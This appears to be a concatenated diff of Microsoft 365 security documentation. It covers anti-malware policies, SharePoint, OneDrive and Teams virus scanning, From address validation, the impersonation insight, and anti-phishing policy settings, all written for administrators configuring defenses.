-`7zip, ace, adoc, ani, arc, arj, asf, asice, avi, bmp, bz, bz2, cab, cda, chm, deb, dex, dll, dmg, doc, docm, docx, dot, dotm, dotx, dwg, eml, eps, epub, excelml, exe, fluid, gif, gzip, heic, heif, html, hyper, icon, ics, infopathml, jar, javabytecode, jnlp, jpeg, json, lib, lnk, lzh, lzma, macho, mhtml, mp3, mp4, mpeg, mpp, msaccess, mscompress, msg, msp, musx, nws, obd, obj, obt, odbcexcel, odc, odf, odg, odi, odm, odp, ods, odt, one, otc, otf, otg, oth, oti, otp, ots, ott, pal, pcx, pdf, pfb, pfile, pif, png, pointpub, pot, potm, potx, powerpointml, ppam, pps, ppsm, ppsx, ppt, pptm, pptx, ps, pub, qcp, quicktime, rar, rar4, riff, rmi, rpm, rpmsg, rtf, smime, swf, tar, tiff, tlb, tnef, ttf, txt, vcf, vcs, vdw, vdx, vsd, vsdm, vsdx, vss, vssm, vssx, vst, vstm, vstx, vsx, vtt, vtx, wav, webp, whiteboard, wmf, woff, woff2, word2, wordml, xar, xlam, xlb, xlc, xls, xlsb, xlsm, xlsx, xlt, xltm, xltx, xml, xps, xz, z, zip, zoo`
-
-If true type matching fails or isn't supported for the file type, then simple extension matching is used.
-
-### Zero-hour auto purge (ZAP) in anti-malware policies
-
-ZAP for malware quarantines messages that are found to contain malware _after_ they've been delivered to Exchange Online mailboxes. By default, ZAP for malware is turned on, and we recommend that you leave it on. For more information, see [Zero-hour auto purge (ZAP) for malware](zero-hour-auto-purge.md#zero-hour-auto-purge-zap-for-malware).
-
-### Quarantine policies in anti-malware policies
-
-Quarantine policies define what users are able to do to quarantined messages, and whether users receive quarantine notifications. By default, recipients don't receive notifications for messages that were quarantined as malware, and users can't release their own quarantined malware messages, regardless of any available settings that admins configure. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
-
-### Admin notifications in anti-malware policies
-
-You can specify an additional recipient (an admin) to receive notifications for malware detected in messages from internal or external senders. You can customize the **From address**, **subject**, and **message text** for internal and external notifications.
-
-These settings aren't configured in the default anti-malware policy by default, or in the Standard or Strict [preset security policies](preset-security-policies.md).
-
-> [!TIP]
-> Admin notifications are sent only for _attachments_ that are classified as malware.
->
-> The quarantine policy that's assigned to the anti-malware policy determines whether recipients receive email notifications for messages that were quarantined as malware.
-
-### Priority of anti-malware policies
-
-If they're [turned on](preset-security-policies.md#use-the-microsoft-defender-portal-to-assign-standard-and-strict-preset-security-policies-to-users), the Standard and Strict preset security policies are applied before any custom anti-malware policies or the default policy (Strict is always first). If you create multiple custom anti-malware policies, you can specify the order that they're applied. Policy processing stops after the first policy is applied (the highest priority policy for that recipient).
-
-For more information about the order of precedence and how multiple policies are evaluated, see [Order and precedence of email protection](how-policies-and-protections-are-combined.md) and [Order of precedence for preset security policies and other policies](preset-security-policies.md#order-of-precedence-for-preset-security-policies-and-other-policies).
-
-## Default anti-malware policy
-
-Every organization has a built-in anti-malware policy named Default that has the following properties:
--- The policy is the default policy (the **IsDefault** property has the value `True`), and you can't delete the default policy.-- The policy is automatically applied to all recipients in the organization, and you can't turn it off.-- The policy is always applied last (the **Priority** value is **Lowest** and you can't change it).
security Anti Malware Protection For Spo Odfb Teams About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/anti-malware-protection-for-spo-odfb-teams-about.md
- Title: Built-in virus protection in SharePoint Online, OneDrive, and Microsoft Teams
- - NOCSH
----
- - SPO160
- - MOE150
- - MET150
-
- - m365-security
- - tier2
-description: Learn about how SharePoint Online detects viruses in files that users upload and prevents users from downloading or syncing the files.
-- Previously updated : 06/09/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
--
-# Built-in virus protection in SharePoint Online, OneDrive, and Microsoft Teams
--
-Microsoft 365 uses a common virus detection engine for scanning files that users upload to SharePoint Online, OneDrive, and Microsoft Teams. This protection is included with all subscriptions that include SharePoint Online, OneDrive, and Microsoft Teams.
-
-> [!IMPORTANT]
-> The built-in anti-virus capabilities are a way to help contain viruses. They aren't intended as a single point of defense against malware for your environment. We encourage all customers to investigate and implement anti-malware protection at various layers and apply best practices for securing their enterprise infrastructure.
-
-## What happens if an infected file is uploaded to SharePoint Online?
-
-The Microsoft 365 virus detection engine scans files asynchronously (at some time after upload). If a user tries to download a file in a web browser or from Teams that hasn't been scanned, a scan is triggered before the download is allowed. **All file types are not automatically scanned**. Heuristics determine the files to scan. When a file is found to contain a virus, the file is flagged.
-
-Here's what happens:
-
-1. A user uploads a file to SharePoint Online.
-2. SharePoint Online, as part of its virus scanning processes, later determines if the file meets the criteria for a scan.
-3. If the file meets the criteria for a scan, the virus detection engine scans the file.
-4. If a virus is found within the scanned file, the virus engine sets a property on the file that indicates the file is infected.
-
-## What happens when a user tries to download an infected file by using the browser?
-
-By default, users can download infected files from SharePoint Online. Here's what happens:
-
-1. In a web browser, a user tries to download a file from SharePoint Online that happens to be infected.
-2. The user is shown a warning that a virus was detected in the file. The user is given the option to proceed with the download and attempt to clean it using anti-virus software on their device.
-
-To change this behavior so users can't download infected files, even from the anti-virus warning window, admins can use the *DisallowInfectedFileDownload* parameter on the **[Set-SPOTenant](/powershell/module/sharepoint-online/Set-SPOTenant)** cmdlet in SharePoint Online PowerShell. The value $true for the *DisallowInfectedFileDownload* parameter completely blocks access to detected/blocked files for users.
-
-For instructions, see [Use SharePoint Online PowerShell to prevent users from downloading malicious files](safe-attachments-for-spo-odfb-teams-configure.md#step-2-recommended-use-sharepoint-online-powershell-to-prevent-users-from-downloading-malicious-files).
-
-## Can admins bypass *DisallowInfectedFileDownload* and extract infected files?
-
-SharePoint admins and global admins are allowed to do forensic file extractions of malware-infected files in SharePoint Online PowerShell with the [Get-SPOMalwareFileContent](/powershell/module/sharepoint-online/get-spomalwarefilecontent) cmdlet. Admins don't need access to the site that hosts the infected content. As long as the file is marked as malware, admins can use **Get-SPOMalwareFileContent** to extract the file.
-
-For more information about the infected file, admins can use the **[Get-SPOMalwareFile](/powershell/module/sharepoint-online/get-spomalwarefile)** cmdlet to see the type of malware that was detected and the status of the infection.
-
-## What happens when the OneDrive sync client tries to sync an infected file?
-
-When a malicious file is uploaded to OneDrive, the file is synced to the local machine before being marked as malware. After the file is marked as malware, the user can't open the synced file from their local machine.
-
-## Extended capabilities with Microsoft Defender for Office 365
-
-Microsoft 365 organizations that have [Microsoft Defender for Office 365](mdo-about.md) included in their subscription or purchased as an add-on can enable Safe Attachments for SharePoint, OneDrive, and Microsoft Teams for enhanced reporting and protection. For more information, see [Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-about.md).
-
-## Related articles
-
-[Malware and ransomware protection in Microsoft 365](/compliance/assurance/assurance-malware-and-ransomware-protection)
-
-[Turn on Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-configure.md).
security Anti Phishing From Email Address Validation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/anti-phishing-from-email-address-validation.md
- Title: How EOP validates the From address to prevent phishing
- - NOCSH
----
- - OWC150
- - MET150
-
- - m365-security
- - tier2
-description: Admins can learn how Exchange Online Protection (EOP) and Outlook.com enforce email address syntax to help prevent phishing.
-- Previously updated : 3/28/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# How EOP validates the From address to prevent phishing
--
-Phishing attacks are a constant threat to any email organization. In addition to using [spoofed (forged) sender email addresses](anti-phishing-protection-spoofing-about.md), attackers often use values in the From address that violate internet standards. To help prevent this type of phishing, Exchange Online Protection (EOP) and Outlook.com require inbound messages to include an RFC-compliant From address as described in this article.
--- If you regularly receive email from organizations that have malformed From addresses as described in this article, encourage these organizations to update their email servers to comply with modern security standards.--- The related Sender field (used by Send on Behalf and mailing lists) isn't affected by these requirements. For more information, see the following blog post: [What do we mean when we refer to the 'sender' of an email?](/archive/blogs/tzink/what-do-we-mean-when-we-refer-to-the-sender-of-an-email).-
-## An overview of email message standards
-
-A standard SMTP email message consists of a *message envelope* and message content. The message envelope contains information that's required for transmitting and delivering the message between SMTP servers. The message content contains message header fields (collectively called the *message header*) and the message body. The message envelope is described in [RFC 5321](https://tools.ietf.org/html/rfc5321), and the message header is described in [RFC 5322](https://tools.ietf.org/html/rfc5322). Recipients never see the actual message envelope because it's generated by the message transmission process, and it isn't actually part of the message.
--- The MAIL FROM address (also known as the `5321.MailFrom` address, P1 sender, or envelope sender) is the email address that's used in the SMTP transmission of the message. This email address is typically recorded in the **Return-Path** header field in the message header (although it's possible for the sender to designate a different **Return-Path** email address).--- The From address (also known as the `5322.From` address or P2 sender) is the email address in the **From** header field, and is the sender's email address that's displayed in email clients. The From address is the focus of the requirements in this article.-
-The From address is defined in detail across several RFCs (for example, RFC 5322 sections 3.2.3, 3.4, and 3.4.1, and [RFC 3696](https://tools.ietf.org/html/rfc3696)). There are many variations on addressing and what's considered valid or invalid. To keep it simple, we recommend the following format and definitions:
-
-`From: "Display Name" <EmailAddress>`
--- **Display Name**: An optional phrase that describes the owner of the email address.
- - We recommend that you always enclose the display name in double quotation marks (") as shown. If the display name contains a comma, you *must* enclose the string in double quotation marks per RFC 5322.
- - If the From address includes a display name, the EmailAddress value must be enclosed in angle brackets (< >) as shown.
- - Microsoft strongly recommends that you insert a space between the display name and the email address.
--- **EmailAddress**: An email address uses the format `local-part@domain`:
- - **local-part**: A string that identifies the mailbox associated with the address. This value is unique within the domain. Often, the mailbox owner's username or GUID is used.
- - **domain**: The fully qualified domain name (FQDN) of the email server that hosts the mailbox identified by the local-part of the email address.
-
- Also:
-
- - One email address only.
- - We recommend that you don't separate the angle brackets with spaces.
- - Don't include text after the email address.
-
-## Examples of good and bad From addresses
-
-The following table contains examples of valid From addresses:
-
-|Address|Comments|
-|||
-|`From: sender@contoso.com`|OK|
-|`From: <sender@contoso.com>`|OK|
-|`From: < sender@contoso.com >`|OK, but not recommended because there are spaces between the angle brackets and the email address.|
-|`From: "Sender, Example" <sender.example@contoso.com>`|OK|
-|`From: "Microsoft 365" <sender@contoso.com>`|OK|
-|`From: Microsoft 365 <sender@contoso.com>`|OK, but not recommended because the display name isn't enclosed in double quotation marks.|
-
-The following table contains examples of From addresses that aren't valid:
-
-|Address|Comments|
-|||
-|**No From address**|When a message arrives at Microsoft 365 or Outlook.com without a From address, we try to assign the MAIL FROM address to the From address to ensure the message is deliverable. Currently, these messages are accepted by the service, even if the original From address is `From: <>`.|
-|`From: <firstname lastname@contoso.com>`|The email address contains a space.|
-|`From: Microsoft 365 sender@contoso.com`|The display name is present, but the email address isn't enclosed in angle brackets.|
-|`From: "Microsoft 365" <sender@contoso.com> (Sent by a process)`|Text after the email address.|
-|`From: Sender, Example <sender.example@contoso.com>`|The display name contains a comma, but isn't enclosed in double quotation marks.|
-|`From: "Microsoft 365 <sender@contoso.com>"`|The whole value is incorrectly enclosed in double quotation marks.|
-|`From: "Microsoft 365 <sender@contoso.com>" sender@contoso.com`|The display name is present, but the email address isn't enclosed in angle brackets.|
-|`From: Microsoft 365<sender@contoso.com>`|No space between the display name and the left angle bracket.|
-|`From: "Microsoft 365"<sender@contoso.com>`|No space between the closing double quotation mark and the left angle bracket.|
-
-## Suppress auto-replies to custom domains
-
-You can't use the value `From: <>` to suppress auto-replies. Instead, you need to set up a *null MX record* for the custom domain. After you set up the null MX record, *all* replies are naturally suppressed because there's no published address for the responding server to send messages to.
-
-For the null MX record, choose an email domain that can't receive email. For example, if the primary domain is contoso.com, you might choose noreply.contoso.com. The null MX record for this domain consists of a single period. For example:
-
-```text
-noreply.contoso.com IN MX .
-```
-
-For more information about setting up MX records, see [Create DNS records at any DNS hosting provider for Microsoft 365](/microsoft-365/admin/get-help-with-domains/create-dns-records-at-any-dns-hosting-provider).
-
-For more information about publishing a null MX, see [RFC 7505](https://tools.ietf.org/html/rfc7505).
-
-## Override From address enforcement
-
-To bypass the From address requirements for inbound email, you can use the IP Allow List (connection filtering) or mail flow rules (also known as transport rules) as described in [Create safe sender lists in Microsoft 365](create-safe-sender-lists-in-office-365.md). Outlook.com doesn't allow overrides of any kind, even through support requests.
-
-You can't override the From address requirements for outbound email that you send from Microsoft 365 or Outlook.com.
-
-## Other ways to prevent and protect against cybercrimes in Microsoft 365
-
-For more information on how to strengthen your organization against phishing, spam, data breaches, and other threats, see [Best practices for securing Microsoft 365 for business plans](/microsoft-365/business-premium/secure-your-business-data).
security Anti Phishing Mdo Impersonation Insight https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/anti-phishing-mdo-impersonation-insight.md
- Title: Impersonation insight
- - NOCSH
----
- - MET150
- - MOE150
-
- - m365-security
- - tier2
-description: Admins use the impersonation insight in Microsoft Defender for Office 365 to view information about the senders and sender domains that are detected as impersonation attempts over the last week by anti-phishing policies.
--- seo-marvel-apr2020- Previously updated : 11/2/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Impersonation insight in Defender for Office 365
--
-_Impersonation_ is when the sender of an email message looks similar to a real or expected sender's email address. Attackers often use impersonated sender email addresses in phishing or other types of attacks to gain the trust of the recipient. There are two basic types of impersonation:
--- **Domain impersonation**: Contains subtle differences in the domain. For example, lila@ćóntoso.com impersonates lila@contoso.com.-- **User impersonation**: Contains subtle differences in the email alias. For example, rnichell@contoso.com impersonates michelle@contoso.com.-
-Domain impersonation is different from _[domain spoofing](anti-phishing-protection-spoofing-about.md)_, because the impersonated domain is often a real, registered domain, but with the intent to deceive. Messages from senders in the impersonated domain are able to pass regular email authentication checks that would otherwise identify the messages as spoofing attempts (SPF, DKIM, and DMARC).
-
-Impersonation protection is part of the anti-phishing policy settings that are exclusive to Microsoft Defender for Office 365. For more information about these settings, see [Impersonation settings in anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365).
-
-Admins can use the impersonation insight in the Microsoft Defender portal to quickly identify messages from impersonated senders or sender domains that are specified in impersonation protection in anti-phishing policies.
-
-## What do you need to know before you begin?
--- You open the Microsoft Defender portal at <https://security.microsoft.com>. To go directly to the **Anti-phishing** page, use <https://security.microsoft.com/antiphishing>. To go directly to the **Impersonation insight** page, use <https://security.microsoft.com/impersonationinsight>.--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell): **Authorization and settings/Security settings/Core Security settings (manage)** or **Authorization and settings/Security settings/Core Security settings (read)**.
- - [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md): Membership in any of the following role groups:
- - **Organization Management**
- - **Security Administrator**
- - **Security Reader**
- - **Global Reader**
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): Membership in the **Global Administrator**, **Security Administrator**, **Security Reader**, or **Global Reader** roles gives users the required permissions _and_ permissions for other features in Microsoft 365.
--- You enable and configure impersonation protection in anti-phishing policies in Microsoft Defender for Office 365. Impersonation protection isn't enabled by default. For more information, see [Configure anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-mdo-configure.md) and [Use the Microsoft Defender portal to assign Standard and Strict preset security policies to users](preset-security-policies.md#use-the-microsoft-defender-portal-to-assign-standard-and-strict-preset-security-policies-to-users).--- For more information about licensing requirements, see [Licensing terms](/office365/servicedescriptions/office-365-advanced-threat-protection-service-description#licensing-terms).-
-## Open the impersonation insight in the Microsoft Defender portal
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Anti-phishing** in the **Policies** section. Or, to go directly to the **Anti-phishing** page, use <https://security.microsoft.com/antiphishing>.
-
-On the **Anti-phishing** page, the impersonation insight looks like this:
--
-The insight has two modes:
--- **Insight mode**: If impersonation protection is enabled and configured in any anti-phishing policies, the insight shows the number of detected messages from impersonated domains and impersonated users (senders) over the past seven days. The number shown is the total of all detected impersonation attempts from all anti-phishing policies.-- **What if mode**: If impersonation protection isn't enabled and configured in any active anti-phishing policies, the insight shows how many messages _would have been_ detected by impersonation protection over the past seven days.-
-To view information about impersonation detections, select **View impersonations** in the impersonation insight to go to the **Impersonation insight** page.
-
-## View information about domain impersonation detections
-
-The **Impersonation insight** page at <https://security.microsoft.com/impersonationinsight> is available when you select **View impersonations** in the impersonation insight on the **Anti-phishing** page.
-
-On the **Impersonation insight** page, verify the **Domains** tab is selected.
-
-You can sort the entries by clicking on an available column header. The following columns are available:<sup>\*</sup>:
--- **Sender Domain**: The impersonating domain, which is the domain that was used to send the email message.-- **Message count**: The number of messages from impersonating sender domain over the last seven days.-- **Impersonation type**: This value shows the detected location of the impersonation (for example, **Domain in address**).-- **Impersonated domain(s)**: The domain that's protected by domain impersonation protection, which should resemble the domain in **Sender domain**.-- **Domain type**: This value is **Company domain** for [accepted domains](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains) or **Custom domain** for custom domains.-- **Policy**: The anti-phishing policy that detected the impersonated domain.-- **Allowed to impersonate**: One of the following values:
- - **Yes**: The domain was configured as trusted domain (an exception for impersonation protection) in the anti-phishing policy that detected the message. Messages from the impersonated domain were detected, but allowed.
- - **No**: The domain was configured for impersonation protection in the anti-phishing policy that detected the message. The action for domain impersonation detections in the anti-phishing policy is done to the message.
-
-<sup>\*</sup> To see all columns, you likely need to do one or more of the following steps:
--- Horizontally scroll in your web browser.-- Narrow the width of appropriate columns.-- Zoom out in your web browser.-
-To change the list of domain impersonation detections from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a comma-separated list of values to find specific domain impersonation detections.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the list of domain impersonation detections to a CSV file.
-
-### View details about a domain impersonation detection
-
-On the **Domains** tab on the **Impersonation insight** page at <https://security.microsoft.com/impersonationinsight?type=Domain>, select one of the impersonation detections by clicking anywhere in the row other than the check box.
-
-The following information is available in the details flyout:
--- **Why did we catch this?**-- **What do you need to do?**-- **Domain summary**: The domain that was detected as impersonation.-- **Whois data**: Contains information about the domain:
- - **Sender location**
- - **Domain created date**
- - **Domain expiration date**
- - **Registrant**
--- **Explorer investigation**: Select the link to open [Threat Explorer or Real-time detections](threat-explorer-real-time-detections-about.md) for additional details about the sender.--- **Email from sender**: This section shows the following information about similar messages from senders in the domain:
- - **Date**
- - **Recipient**
- - **Subject**
- - **Sender**
- - **Sender IP**
- - **Delivery action**
-
-> [!TIP]
-> To see details about other domain impersonation entries without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-To prevent senders in a detected domain from being identified as domain impersonation, see the next subsection.
-
-### Exempt senders in a detected domain from future domain impersonation checks
-
-On the **Domains** tab of the **Impersonation insight** page at <https://security.microsoft.com/impersonationinsight?type=Domain>, use the following steps to exempt senders in a detected domain from being identified as domain impersonation:
-
-Select the entry from the list by clicking anywhere in the row other than the check box.
-
-In the details flyout that opens, use the **Select impersonation policy to modify** and **Add to the allowed to impersonation list** settings at the top of the flyout. These settings work together to add the domain to the [Trusted senders and domains](anti-phishing-policies-about.md#trusted-senders-and-domains) list in the policy that incorrectly identified the message as domain impersonation:
--- Select the anti-phishing policy in the dropdown list. The anti-phishing policy that was responsible for detecting the message is shown in the **Policy** value on the **Domain** tab.-- Slide the toggle to on: :::image type="icon" source="../../media/scc-toggle-on.png" border="false"::: to add the domain to the **Trusted senders and domains** list in the selected policy.-
- To remove the domain from the **Trusted senders and domains** list, slide the toggle back to :::image type="icon" source="../../media/scc-toggle-off.png" border="false":::
-
-When you're finished in the details flyout, select **Close**.
-
-## View information about user impersonation detections
-
-The **Impersonation insight** page at <https://security.microsoft.com/impersonationinsight> is available when you select **View impersonations** in the impersonation insight on the **Anti-phishing** page.
-
-On the **Impersonation insight** page, select the **Users** tab.
-
-You can sort the entries by clicking on an available column header. The following columns are available:<sup>\*</sup>:
--- **Sender**: The email address of the impersonating sender that sent the email message.-- **Message count**: The number of messages from the impersonating sender over the last seven days.-- **Impersonation type**: For example, **User in display name**.-- **Impersonated user(s)**: The display name and email address of the sender that's protected by impersonation protection, which resembles the email address in **Sender**.-- **User type**: The type of protection applied (for example, **Protected user** or **Mailbox Intelligence**).-- **Policy**: The anti-phishing policy that detected the impersonated sender.-- **Allowed to impersonate**: One of the following values:
- - **Yes**: The sender was configured as trusted user (an exception for impersonation protection) in the anti-phishing policy that detected the message. Messages from the impersonated sender were detected, but allowed.
- - **No**: The sender was configured for impersonation protection in the anti-phishing policy that detected the message. The action for user impersonation detections in the anti-phishing policy is done to the message.
-
-<sup>\*</sup> To see all columns, you likely need to do one or more of the following steps:
--- Horizontally scroll in your web browser.-- Narrow the width of appropriate columns.-- Zoom out in your web browser.-
-To change the list of user impersonation detections from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a comma-separated list of values to find specific user impersonation detections.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the list of user impersonation detections to a CSV file.
-
-### View details about a user impersonation detection
-
-On the **Users** tab on the **Impersonation insight** page at <https://security.microsoft.com/impersonationinsight?type=User>, select one of the impersonation detections by clicking anywhere in the row other than the check box.
-
-The following information is available in the details flyout:
--- **Why did we catch this?**-- **What do you need to do?**-- **Sender summary**: The sender that was detected as impersonation.--- **Explorer investigation**: Select the link to open [Threat Explorer or Real-time detections](threat-explorer-real-time-detections-about.md) for additional details about the sender.--- **Email from sender**: This section shows the following information about similar messages from the sender:
- - **Date**
- - **Recipient**
- - **Subject**
- - **Sender**
- - **Sender IP**
- - **Delivery action**
-
-> [!TIP]
-> To see details about other user impersonation entries without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-To prevent a detected sender from being identified as user impersonation, see the next subsection.
-
-### Exempt a detected sender from future user impersonation checks
-
-On the **Users** tab of the **Impersonation insight** page at <https://security.microsoft.com/impersonationinsight?type=User>, use the following steps to exempt detected senders from being identified as user impersonation:
-
-Select the entry from the list by clicking anywhere in the row other than the check box.
-
-In the details flyout that opens, use the **Select impersonation policy to modify** and **Add to the allowed to impersonation list** settings at the top of the flyout. These settings work together to add the sender to the [Trusted senders and domains](anti-phishing-policies-about.md#trusted-senders-and-domains) list in the policy that incorrectly identified the message as user impersonation:
--- Select the anti-phishing policy in the dropdown list. The anti-phishing policy that was responsible for detecting the message is shown in the **Policy** value on the **Domain** tab.-- Slide the toggle to on: :::image type="icon" source="../../media/scc-toggle-on.png" border="false"::: to add the sender to the **Trusted senders and domains** list in the selected policy.-
- To remove the sender from the **Trusted senders and domains** list, slide the toggle back to :::image type="icon" source="../../media/scc-toggle-off.png" border="false":::
-
-When you're finished in the details flyout, select **Close**.
security Anti Phishing Policies About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/anti-phishing-policies-about.md
- Title: Anti-phishing policies
- - NOCSH
-----
- - m365-security
- - tier2
-
- - seo-marvel-apr2020
-description: Admins can learn about the anti-phishing policies that are available in Exchange Online Protection (EOP) and Microsoft Defender for Office 365.
- Previously updated : 4/8/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Anti-phishing policies in Microsoft 365
--
-Policies to configure anti-phishing protection settings are available in Microsoft 365 organizations with Exchange Online mailboxes, standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, and Microsoft Defender for Office 365 organizations.
-
-Examples of Microsoft Defender for Office 365 organizations include:
--- Microsoft 365 Enterprise E5, Microsoft 365 Education A5, etc.-- [Microsoft 365 Enterprise](https://www.microsoft.com/microsoft-365/enterprise/home)-- [Microsoft 365 Business](https://www.microsoft.com/microsoft-365/business)-- [Microsoft Defender for Office 365 as an add-on](https://products.office.com/exchange/advance-threat-protection)-
-The high-level differences between anti-phishing policies in EOP and anti-phishing policies in Defender for Office 365 are described in the following table:
-
-|Feature|Anti-phishing policies<br>in EOP|Anti-phishing policies<br>in Defender for Office 365|
-||::|::|
-|Automatically created default policy|Γ£ö|Γ£ö|
-|Create custom policies|Γ£ö|Γ£ö|
-|Common policy settings<sup>\*</sup>|Γ£ö|Γ£ö|
-|Spoof settings|Γ£ö|Γ£ö|
-|First contact safety tip|Γ£ö|Γ£ö|
-|Impersonation settings||Γ£ö|
-|Advanced phishing thresholds||Γ£ö|
-
-<sup>\*</sup> In the default policy, the policy name and description are read-only (the description is blank), and you can't specify who the policy applies to (the default policy applies to all recipients).
-
-To configure anti-phishing policies, see the following articles:
--- [Configure anti-phishing policies in EOP](anti-phishing-policies-eop-configure.md)-- [Configure anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-mdo-configure.md)-
-The rest of this article describes the settings that are available in anti-phishing policies in EOP and Defender for Office 365.
-
-## Common policy settings
-
-The following policy settings are available in anti-phishing policies in EOP and Defender for Office 365:
--- **Name**: You can't rename the default anti-phishing policy. After you create a custom anti-phishing policy, you can't rename the policy in the Microsoft Defender portal.--- **Description** You can't add a description to the default anti-phishing policy, but you can add and change the description for custom policies that you create.--- **Users, groups, and domains** and **Exclude these users, groups, and domains**: Recipient filters to identify the internal recipients that the policy applies to. At least one condition is required in custom policies. Conditions and exceptions aren't available in the default policy (the default policy applies to all recipients). You can use the following recipient filters for conditions and exceptions:-
- - **Users**: One or more mailboxes, mail users, or mail contacts in the organization.
- - **Groups**:
- - Members of the specified distribution groups or mail-enabled security groups (dynamic distribution groups aren't supported).
- - The specified Microsoft 365 Groups.
- - **Domains**: One or more of the configured [accepted domains](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains) in Microsoft 365. The recipient's primary email address is in the specified domain.
-
- You can use a condition or exception only once, but the condition or exception can contain multiple values:
-
- - Multiple **values** of the **same condition or exception** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_):
- - **Conditions**: If the recipient matches **any** of the specified values, the policy is applied to them.
- - **Exceptions**: If the recipient matches **any** of the specified values, the policy isn't applied to them.
-
- - Different **types of exceptions** use OR logic (for example, _\<recipient1\>_ or _\<member of group1\>_ or _\<member of domain1\>_). If the recipient matches **any** of the specified exception values, the policy isn't applied to them.
-
- - Different **types of conditions** use AND logic. The recipient must match **all** of the specified conditions for the policy to apply to them. For example, you configure a condition with the following values:
- - Users: `romain@contoso.com`
- - Groups: Executives
-
- The policy is applied to `romain@contoso.com` _only_ if he's also a member of the Executives group. Otherwise, the policy isn't applied to him.
-
- > [!TIP]
- > At least one selection in the **Users, groups, and domains** settings is required in custom anti-phishing policies to identify the message **recipients that the policy applies to**. Anti-phishing policies in Defender for Office 365 also have [impersonation settings](#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365) where you can specify **sender email addresses or sender domains that receive impersonation protection** as described later in this article.
-
-## Spoof settings
-
-Spoofing is when the From address in an email message (the sender address that's shown in email clients) doesn't match the domain of the email source. For more information about spoofing, see [Anti-spoofing protection in Microsoft 365](anti-phishing-protection-spoofing-about.md).
-
-The following spoof settings are available in anti-phishing policies in EOP and Defender for Office 365:
--- **Enable spoof intelligence**: Turns spoof intelligence on or off. We recommend that you leave it turned on.-
- When spoof intelligence is enabled, the **spoof intelligence insight** shows spoofed senders that were automatically detected and allowed or blocked by spoof intelligence. You can manually override the spoof intelligence verdict to allow or block the detected spoofed senders from the insight. But when you do, the spoofed sender disappears from the spoof intelligence insight, and is visible only on the **Spoofed senders** tab on the **Tenant Allow/Block Lists** page at <https://security.microsoft.com/tenantAllowBlockList?viewid=SpoofItem>. Or, you can manually create allow or block entries for spoofed senders in the Tenant Allow/Block List, even if they're not detected by the spoof intelligence insight. For more information, see the following articles:
-
